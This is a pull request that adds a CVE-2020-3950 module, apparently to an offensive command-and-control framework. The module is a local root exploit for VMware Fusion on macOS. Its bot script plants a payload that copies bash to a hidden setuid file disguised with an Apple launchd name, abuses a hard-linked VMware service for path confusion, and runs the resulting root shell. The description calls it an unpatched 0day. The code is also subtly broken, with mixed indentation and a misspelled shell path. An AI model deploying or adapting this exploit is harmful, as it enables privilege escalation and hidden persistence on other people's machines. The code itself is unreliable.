### PR TITLE
CVE-2020-3950

### DIFF
--- a/server/modules/bot/CVE-2020-3950.py
+++ b/server/modules/bot/CVE-2020-3950.py
@@ -1,0 +1,43 @@
+# -*- coding: utf-8 -*-
+__author__ = "HackerFantastic"
+__license__ = "GPLv3"
+
+import os
+import subprocess
+import time
+
+env = {}
+env["PATH"] = "/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/Applications/VMware Fusion.app/Contents/Public:/usr/local/sbin"
+
+def run(options):
+	print("Creating directories")
+	path = os.getenv("HOME")
+	try:
+		os.rmdir(path + "/Contents/Library/services")
+                os.rmdir(path + "/a")
+	except OSError:
+		print("directories don't exist to rm - this is ok")
+	try:
+    		os.makedirs(path + "/Contents/Library/services/")
+    		os.makedirs(path + "/a/b/c")
+	except OSError:
+		print("directories exist")
+    	print("Creating payload")
+    	myfile = open(path + "/Contents/Library/services/VMware USB Arbitrator Service","wb")
+	myfile.write("#!/usr/bin/python\nimport os\nos.setuid(0)\nos.system('cp /bin/bash /tmp/.com.apple.launchd.rWGGYVvlyx;chmod 4755 /tmp/.com.apple.launchd.rWGGYVvlyx')\n")
+	myfile.close()
+	os.chmod(path + "/Contents/Library/services/VMware USB Arbitrator Service",0755)
+	print("Linking service for path confusion")
+	try:
+		os.link("/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service",path + "/a/b/c/linked")
+	except OSError:
+		print("link exists")
+	p = os.fork()
+	if p == 0:
+		print("exploiting service")
+		os.execve(path + "/a/b/c/linked", ["VMware USB Arbitrator Service"], env)
+	time.sleep(5)
+	os.kill(p,9)
+	time.sleep(7)
+    	print("running setuid root shell CMD via /tmp/.com.apple.launchd.rWGGYVvlyx")
+	subprocess.call("/tmp/.com.pple.launchd.rWGGYVvlyx -p -c 'id;ls -al /tmp/.com.apple.launchd.rWGGYVvlyx'", shell=True)

--- a/server/modules/server/CVE-2020-3950.py
+++ b/server/modules/server/CVE-2020-3950.py
@@ -1,0 +1,19 @@
+# -*- coding: utf-8 -*-
+__author__ = "HackerFantastic"
+__license__ = "GPLv3"
+
+from server.modules.helper import *
+
+
+class Module(ModuleABC):
+    def get_info(self):
+        return {
+            "Author:": ["HackerFantastic"],
+            "Description": "CVE-2020-3950 macOS VMware fusion <= 11.5.2 local root exploit",
+            "References": [
+                "https://www.vmware.com/security/advisories/VMSA-2020-0005.html",
+                "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2020-3950.sh",
+		"https://blog.grimm-co.com/post/analyzing-suid-binaries/"
+            ],
+            "Stoppable": False
+        }


### PR DESCRIPTION
This is a local root exploit that works on multiple versions of VMWare fusion 10.0 and upto 11.5.2. It is currently not patched as a patch was made for CVE-2020-3950 that did not fix the vulnerabilities correctly, thus this vulnerability is still a 0day LPE on impacted MacOS hosts. 